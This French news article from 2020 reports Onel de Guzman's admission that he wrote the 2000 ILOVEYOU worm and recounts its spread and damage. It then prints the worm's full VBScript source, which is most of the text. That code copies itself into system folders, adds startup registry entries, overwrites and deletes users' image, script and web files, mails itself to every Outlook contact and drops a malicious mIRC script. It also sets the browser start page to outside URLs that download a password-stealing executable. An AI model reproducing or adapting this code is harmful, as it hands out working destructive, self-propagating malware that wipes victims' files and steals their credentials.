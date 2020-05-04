Pendant deux décennies, un quasi-mystère a plané sur l’identité de l’individu derrière cette attaque. En effet, suite aux enquêtes initiales menées à l’époque de l’apparition du virus informatique, le présumé auteur (alors étudiant en informatique) n’avait pas réfuté la possibilité qu’il soit le véritable responsable. Dans une récente publication, ce dernier met fin à toute spéculation et assume l’entière responsabilité de la première pandémie de virus informatique.
Celle-ci est connue du monde depuis le 4 mai 2000 sous diverses appellations : I Love You (je t’aime), Loveletter ou encore Love Bug. Les victimes recevaient un courriel avec une pièce jointe intitulée LOVE-LETTER-FOR-YOU. Cette dernière contenait en fait du code VBScript capable d’écraser des fichiers, de voler des mots de passe et d’envoyer des copies de lui-même de façon automatique à tous les contacts du carnet d’adresses Microsoft Outlook de la victime. En quelques heures, le virus mis au point par Onel de Guzman s’était propagé dans le monde entier. Bilan initial : près de 45 millions de machines, soit environ 10 % de tous les ordinateurs connectés à Internet sur la planète à cette époque. De grosses organisations comme le Pentagone et le Parlement du Royaume-Uni avaient dû déconnecter leurs infrastructures de courriel pendant des heures pour s’en prémunir. D’après ce que rapporte la BBC, les ravages causés par l’attaque informatique se chiffrent à des milliards de dollars.
À l'époque, la connexion à Internet se faisait par le biais du réseau téléphonique commuté et nécessitait de tels mots de passe. Onel de Guzman a expliqué à la BBC qu’il avait créé le ver informatique afin de voler des mots de passe et d'accéder ainsi à Internet sans débourser d’argent. Désormais âgé de 44 ans, de Guzman assure qu’il n’a jamais eu l’intention que son ver informatique se répande à l’échelle mondiale.
« Je ne m’attendais pas à ce qu’il se retrouve aux États-Unis et en Europe. J’étais surpris », a-t-il affirmé dans une entrevue. Pourtant, il a modifié le code du virus au printemps 2000 de façon à profiter d’une lacune du système d’exploitation Microsoft Windows 95, ce, pour créer une chaîne de transmission automatique au travers du logiciel Outlook de Microsoft. Initialement, il faisait parvenir le virus uniquement à des victimes aux Philippines. Le contact avec ces dernières se faisait via des espaces de clavardage.
À l’époque, les autorités le soupçonnaient sur la base de traces retrouvées sur des supports informatiques logés dans une chambre d’étudiant qu’il partageait avec son frère. En fait, les disques trouvés sur place par la police de Manille prouvaient qu’il était l’un des auteurs. Sur cet aspect, Onel de Guzman précise qu’il était le seul auteur du virus.
« C'est un cheval de Troie qui proclame son amour pour le destinataire et vous demande d'ouvrir sa pièce jointe. Même pour un premier rendez-vous, il vous aime alors tellement qu'il envoie des copies de lui-même à toutes les personnes de votre carnet d'adresses et commence à détruire des fichiers sur votre disque », souligne un internaute des contradictions caractéristiques de la conception de ce virus. En effet, comment expliquer la présence de fonctionnalités de destruction de fichiers alors que l’objectif était de récupérer des mots de passe pour accéder à Internet sans dépenser de l’argent ?
Onel de Guzman a exprimé des regrets quant aux dommages que sa création a causés. À Manille, il œuvre désormais dans la réparation de téléphones portables. Le code source du ver informatique est disponible à des fins pédagogiques :
|Code VBScript :
|Sélectionner tout
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next rem Setup global variables to be used throughout subroutines and functions. Dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow eq = "" ctr = 0 rem Open the current script file and define "vbscopy" which can be used to rem read its own contents. Used to replicate itself in other files. Set fso = CreateObject("Scripting.FileSystemObject") Set file = fso.OpenTextFile(WScript.ScriptFullname, 1) vbscopy = file.ReadAll main() rem Subroutine to initalize the program Sub main() On Error Resume Next Dim wscr, rr Set wscr = CreateObject("WScript.Shell") rr = wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") If (rr >= 1) Then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD" End If rem Finds special folders, such as system, temporary and windows folders. Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) rem Copy itself into VBScript files MSKernel32.vbs, Win32DLL.vbs and rem LOVE-LETTER-FOR-YOU.TXT.vbs c.Copy(dirsystem & "\MSKernel32.vbs") c.Copy(dirwin & "\Win32DLL.vbs") c.Copy(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() End Sub rem Subroutine to create/update registry values. Sub regruns() On Error Resume Next Dim num, downread rem Set the system to automatically run MSKernel32.vbs and Win32DLL.vbs on startup. regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32", dirsystem & "\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL", dirwin & "\Win32DLL.vbs" rem Get internet Explorer's download directory. downread = "" downread = regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") rem If the directory wasn't found, then use C:\ drive as the download directory. If (downread = "") Then downread = "c:\" End If rem Check if a file named "WinFAT32.exe" exists in the system files. If (fileexist(dirsystem & "\WinFAT32.exe") = 1) Then Randomize rem Generate a random number from 1 to 4. num = Int((4 * Rnd) + 1) rem Randomly update the Internet Explorer's start page that leads to a rem page that will download a malicious executable "WIN-BUGSFIX.exe". If num = 1 Then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" ElseIf num = 2 Then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" ElseIf num = 3 Then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" ElseIf num = 4 Then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\StartPage", "http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" End If End If rem Check if the "WIN-BUGSFIX.exe" file exists in the download directory. If (fileexist(downread & "\WIN-BUGSFIX.exe") = 0) Then rem Add WIN-BUGSFIX.exe to run on startup regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX", downread & "\WIN-BUGSFIX.exe" rem Update Internet Explorer's start page to "about:blank" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage", "about:blank" End If End Sub rem Subroutine to list folders in drives. Sub listadriv() On Error Resume Next Dim d, dc, s Set dc = fso.Drives For Each d In dc If (d.DriveType = 2) Or (d.DriveType = 3) Then folderlist(d.path & "\") End If Next listadriv = s End Sub rem Subroutine infect other files, by copying itself into them as well rem as creating a malicious mIRC script. Sub infectfiles(folderspec) On Error Resume Next Dim f, f1, fc, ext, ap, mircfname, s, bname, mp3 Set f = fso.GetFolder(folderspec) Set fc = f.Files For Each f1 In fc ext = fso.GetExtensionName(f1.path) ext = lcase(ext) s = lcase(f1.name) rem Copies itself into every file with vbs/vbe extension. If (ext = "vbs") Or (ext = "vbe") Then Set ap = fso.OpenTextFile(f1.path, 2, true) ap.write vbscopy ap.close rem Copies itself into every file with js/jse/css/wsh/sct/hta extension. ElseIf (ext = "js") Or (ext = "jse") Or (ext = "css") Or (ext = "wsh") Or (ext = "sct") Or (ext = "hta") Then Set ap = fso.OpenTextFile(f1.path, 2, true) ap.write vbscopy ap.close bname = fso.GetBaseName(f1.path) Set cop = fso.GetFile(f1.path) cop.copy(folderspec & "\" & bname & ".vbs") fso.DeleteFile(f1.path) rem Copies itself into every file with jpg/jpeg extension. ElseIf (ext = "jpg") Or (ext = "jpeg") Then rem Copies itself Set ap = fso.OpenTextFile(f1.path, 2, true) ap.write vbscopy ap.close Set cop = fso.GetFile(f1.path) cop.copy(f1.path & ".vbs") fso.DeleteFile(f1.path) rem Copies itself into every file with mp3/mp2 extension. ElseIf (ext = "mp3") Or (ext = "mp2") Then Set mp3 = fso.CreateTextFile(f1.path & ".vbs") mp3.write vbscopy mp3.close Set att = fso.GetFile(f1.path) att.attributes = att.attributes + 2 End If If (eq <> folderspec) Then rem Looks for mIRC and related files to determine whether it rem should create/replace its script.ini with a malicious script. If (s = "mirc32.exe") Or (s = "mlink32.exe") Or (s = "mirc.ini") Or (s = "script.ini") Or (s = "mirc.hlp") Then Set scriptini = fso.CreateTextFile(folderspec & "\script.ini") rem The following mIRC script checks if the "nick" of a user is the same rem as "me" to halt and send a DCC command to send a message to the user rem with a link to the LOVE=LETTER-FOR-YOU html page on the system. scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, If mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /If ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick" & dirsystem & "\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq = folderspec End If End If Next End Sub rem Subroutine used to get file listing of a folder. Sub folderlist(folderspec) On Error Resume Next Dim f, f1, sf Set f = fso.GetFolder(folderspec) Set sf = f.SubFolders For Each f1 In sf infectfiles(f1.path) folderlist(f1.path) Next End Sub rem Subroutine used to create/write registry entries. Sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey, regvalue End Sub rem Subroutine used to get registry entries. Function regget(value) Set regedit = CreateObject("WScript.Shell") regget = regedit.RegRead(value) End Function rem Function to check if a file exists. Function fileexist(filespec) On Error Resume Next Dim msg If (fso.FileExists(filespec)) Then msg = 0 Else msg = 1 End If fileexist = msg End Function rem Function to check if a folder exists. Function folderexist(folderspec) On Error Resume Next Dim msg If (fso.GetFolderExists(folderspec)) Then msg = 0 Else msg = 1 End If fileexist = msg End Function rem Subroutine to send emails to the user's contacts (MAPI) Sub spreadtoemail() On Error Resume Next Dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad Set regedit = CreateObject("WScript.Shell") Set out = WScript.CreateObject("Outlook.Application") Set mapi = out.GetNameSpace("MAPI") rem Goes through all contacts in the address book and sends an email rem with the LOVE-LETTER-FOR-YOU program as an attachment. For ctrlists = 1 To mapi.AddressLists.Count Set a = mapi.AddressLists(ctrlists) x = 1 regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a) If (regv = "") Then regv = 1 End If If (int(a.AddressEntries.Count) > int(regv)) Then For ctrentries = 1 To a.AddressEntries.Count malead = a.AddressEntries(x) regad = "" regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead ) If (regad = "") Then Set male = out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead, 1, "REG_DWORD" End If x = x + 1 Next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count Else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a, a.AddressEntries.Count End If Next Set out = Nothing Set mapi = Nothing End Sub rem Subroutine to generate and create the HTML file for LOVE-LETTER-FOR-YOU.HTM. Sub html On Error Resume Next Dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6 rem Generates an HTML page which contains JScript and VBScript replicate itself. rem by leveraging ActiveX. It also listens for mouse and key events, which rem ends up open more windows of the page. dta1 = "<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>" & vbcrlf & _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>" & vbcrlf & _ "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>" & vbcrlf & _ "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ " & vbcrlf & _ "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>" & vbcrlf & _ "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>" & vbcrlf & _ "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>" & vbcrlf & _ "<?-?BODY><?-?HTML>" & vbcrlf & _ "<SCRIPT language=@-@JScript@-@>" & vbcrlf & _ "<!--?-??-?" & vbcrlf & _ "If (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}" & vbcrlf & _ "?-??-?-->" & vbcrlf & _ "<?-?SCRIPT>" & vbcrlf & _ "<SCRIPT LANGUAGE=@-@VBScript@-@>" & vbcrlf & _ "<!--" & vbcrlf & _ "on error resume next" & vbcrlf & _ "Dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit" & vbcrlf & _ "aw=1" & vbcrlf & _ "code=" dta2 = "Set fso=CreateObject(@-@Scripting.FileSystemObject@-@)" & vbcrlf & _ "Set dirsystem=fso.GetSpecialFolder(1)" & vbcrlf & _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))" & vbcrlf & _ "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))" & vbcrlf & _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))" & vbcrlf & _ "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)" & vbcrlf & _ "wri.write code4" & vbcrlf & _ "wri.close" & vbcrlf & _ "If (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) Then" & vbcrlf & _ "If (err.number=424) Then" & vbcrlf & _ "aw=0" & vbcrlf & _ "End If" & vbcrlf & _ "If (aw=1) Then" & vbcrlf & _ "document.write @-@ERROR: can#-#t initialize ActiveX@-@" & vbcrlf & _ "window.close" & vbcrlf & _ "End If" & vbcrlf & _ "End If" & vbcrlf & _ "Set regedit = CreateObject(@-@WScript.Shell@-@)" & vbcrlf & _ "regedit.RegWrite@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@" & vbcrlf & _ "?-??-?-->" & vbcrlf & _ "<?-?SCRIPT>" dt1 = replace(dta1, chr(35) & chr(45) & chr(35), "'") dt1 = replace(dt1, chr(64) & chr(45) & chr(64), """") dt4 = replace(dt1, chr(63) & chr(45) & chr(63), "/") dt5 = replace(dt4, chr(94) & chr(45) & chr(94), "\") dt2 = replace(dta2, chr(35) & chr(45) & chr(35), "'") dt2 = replace(dt2, chr(64) & chr(45) & chr(64), """") dt3 = replace(dt2, chr(63) & chr(45) & chr(63), "/") dt6 = replace(dt3, chr(94) & chr(45) & chr(94), "\") Set fso = CreateObject("Scripting.FileSystemObject") Set c = fso.OpenTextFile(WScript.ScriptFullName, 1) lines = Split(c.ReadAll,vbcrlf) l1 = ubound(lines) For n = 0 to ubound(lines) lines(n) = replace(lines(n), "'", chr(91) + chr(45) + chr(91)) lines(n) = replace(lines(n), """", chr(93) + chr(45) + chr(93)) lines(n) = replace(lines(n), "\", chr(37) + chr(45) + chr(37)) If (l1 = n) Then lines(n) = chr(34) + lines(n) + chr(34) Else lines(n) = chr(34) + lines(n) + chr(34) & " & vbcrlf & _" End If Next rem Create the LOVE-LETTER-FOR-YOU.HTM file in the system directory. Set b = fso.CreateTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM") b.close Set d = fso.OpenTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM", 2) d.write dt5 d.write join(lines, vbcrlf) d.write vbcrlf d.write dt6 d.close End Sub
Source : BBC
Et vous ?
Quels enseignements tirez-vous du code source de ce maliciel ?
Quel commentaire faites-vous de la présence de fonctionnalités destructrices en son sein ?
Ne sont-elles pas en contradiction avec ce que l’auteur dit être ses objectifs initiaux ?
Quelles sont vos anecdotes en lien avec cette pandémie informatique de l’année 2000 ?